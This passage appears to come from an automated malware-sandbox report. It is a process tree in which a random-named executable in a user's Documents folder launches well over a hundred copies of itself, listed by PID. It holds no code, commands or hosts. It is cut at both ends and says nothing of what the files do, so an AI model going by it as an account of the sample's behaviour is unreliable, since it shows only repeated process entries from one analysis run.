    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:12144
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18320
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18584
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18824
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19056
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19420
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18528
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19016
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19380
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17124
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18936
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14204
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18200
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18884
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5912
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8208
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19804
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20124
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20444
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19524
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20060
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:808
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:4248
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20348
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19268
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19880
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18592
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19652
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20380
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19952
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20700
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21200
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21444
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20540
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21252
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20412
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20924
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21012
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20768
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:4088
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:4348
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21392
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20388
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13340
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21688
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22004
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22336
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16276
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22280
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21524
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22116
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21884
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17360
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21520
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:19980
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22612
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22828
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22988
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23348
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20056
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23180
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:21840
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22568
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7632
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23148
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22616
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23768
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23988
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24156
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24436
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23624
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24068
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24312
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24552
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23016
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20716
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24260
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23648
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24768
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24980
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:25172
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24856
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:25400
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24600
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:25288
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23576
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:25812
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:25472
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:25604
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:26408
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23760
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:26080
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:26396
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24704
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23660
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23644
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:25616
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24672
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:27084
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14884
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:27780
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:26800
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:28132
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:28644
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:28120
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:28240
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:27976
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:28992
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:29256
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:29052
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:29376
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:29752
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:30416
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:23556
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:30156
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:28764
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:30508
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:30400
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:27684
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:30320
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:30724
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:31312
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:31584
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:30792
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:31116
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:27864
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5460
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:29596
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:27680
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:31848
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:32140
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:24512
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:32308
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:22104
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:32348
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6688
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:20344
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:30580
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:32180
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:27224
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:30852
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:10976
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:32516
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:25660
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:3596
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:1180
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6992
- C:\Users\Admin\Documents\YZxK0OWqHiSObreIaOg4z4f4.exe
